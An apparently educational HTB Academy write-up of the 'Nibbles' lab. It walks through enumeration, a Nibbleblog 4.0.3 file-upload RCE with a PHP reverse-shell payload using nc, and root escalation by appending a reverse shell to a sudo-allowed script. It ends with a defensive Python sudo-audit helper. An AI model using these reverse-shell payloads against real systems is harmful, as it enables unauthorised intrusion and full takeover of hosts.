# Nibbles

###### tags: `HTB ACADEMY GETTING STARTED`

## step1. Information Enumeration

```
nmap -sC -sV 10.129.66.130
```

![](https://i.imgur.com/ku1FcWF.png)

Only ports 80 and 22 were found.

## step2. Exploit

The home page shows only a single line of text; looking at the HTML comments reveals a directory worth checking.

![](https://i.imgur.com/8HNDmRI.png)

```
https://10.129.66.130/nibbleblog
```

![](https://i.imgur.com/AAk8u9A.png)

### Directory brute-forcing

```
gobuster dir -u http://10.129.66.130/nibbleblog/ -w /usr/share/wordlists/dirb/common.txt
```

![](https://i.imgur.com/gU7EELM.png)

```
http://10.129.66.130/nibbleblog/README
```

![](https://i.imgur.com/kzrHkaO.png)

#### Nibbleblog v4.0.3

[NibbleBlog 4.0.3: Code Execution](https://curesec.com/blog/article/blog/NibbleBlog-403-Code-Execution-47.html)

Vulnerability overview: Nibbleblog v4.0.3 ships with the "My image" plugin installed by default. The plugin does not check the file extension of uploads, so an uploaded PHP file can be executed [(RCE vulnerability)](https://cloud.tencent.com/developer/article/1668900), which in turn makes a CSRF attack possible. The prerequisite is logging in to the admin back end and obtaining administrator privileges first.

### Site back end (admin panel)

```
admin/nibbles
```

![](https://i.imgur.com/kR2gZJS.png)

Find the "My image" plugin, upload the PoC, then open image.php to execute it.

```
poc:<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> <attack port> >/tmp/f"); ?>
```

![](https://i.imgur.com/9P3IjYq.png)

![](https://i.imgur.com/afloXYQ.png)

```
Listener: nc -nvlp <attack port>
```

![](https://i.imgur.com/RRJOE4V.png)

### User shell obtained

## step3. Privilege escalation

`sudo -l`: a monitor.sh that may be run with root privileges is found. It looks like a bash script, so attack code can be appended to it with echo.

![](https://i.imgur.com/YQXb6BW.png)

```
poc:echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attack ip> <attack port> >/tmp/f' | tee -a /home/nibbler/personal/stuff/monitor.sh
```

![](https://i.imgur.com/SVSxcUu.png)

If you are not sure whether the write succeeded, check the file with cat. If it worked, the end of the file looks like this:

![](https://i.imgur.com/Wogc4b4.png)

with this extra line at the bottom:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.152 9443 >/tmp/f
```

```
sudo personal/stuff/monitor.sh
```

![](https://i.imgur.com/6ZAYaZt.png)

```
nc -nvlp 9443
```

![](https://i.imgur.com/LvXWIf8.png)

### Root obtained

---

To get a proper `user@host:path` prompt in the shell, spawn a pty:

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

![](https://i.imgur.com/VSiz4ID.png)
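The root cause of step 3 is a sudo rule whose target script lives in a directory the unprivileged user owns. The following audit helper, added here as an example and not part of the original writeup, parses `sudo -l` output and flags rule targets that are not root-owned or are group/world-writable; the sample output, paths and function names are constructed for illustration.

```python
"""Audit helper: flag `sudo -l` targets that a non-root user could modify."""
import os
import re
import stat

# One rule line from `sudo -l`, e.g.
#   "(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh"
# Optional tags such as NOPASSWD: or SETENV: may precede the command list.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?:[A-Z]+:\s*)*(?P<cmds>.+)$")


def parse_sudo_rules(sudo_l_output):
    """Return (runas, command_path) for every command in the rule lines."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # header text such as "User x may run ..." is not a rule
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if cmd and cmd != "ALL":
                # first token is the program; anything after it is arguments
                rules.append((m.group("runas").strip(), cmd.split()[0]))
    return rules


def modifiable_by_non_root(st):
    """True if a non-root user can change this inode: not root-owned, or group/world-writable."""
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def risky_sudo_targets(sudo_l_output):
    """Return [(path, reason)] for rule targets the invoking user could tamper with."""
    findings = []
    for _runas, path in parse_sudo_rules(sudo_l_output):
        if not os.path.isabs(path) or not os.path.exists(path):
            continue
        if modifiable_by_non_root(os.stat(path)):
            findings.append((path, "target is not root-owned or is group/world-writable"))
        elif modifiable_by_non_root(os.stat(os.path.dirname(path))):
            findings.append((path, "parent directory allows the target to be replaced"))
    return findings


if __name__ == "__main__":
    import subprocess
    # -n: never prompt for a password; fine for an unattended audit
    out = subprocess.run(["sudo", "-n", "-l"], capture_output=True, text=True).stdout
    for path, reason in risky_sudo_targets(out):
        print(f"[!] sudo target {path}: {reason}")
```

The fix on a real host is to keep sudo-permitted scripts root-owned, mode 0755 or stricter, under a root-owned directory such as /usr/local/sbin.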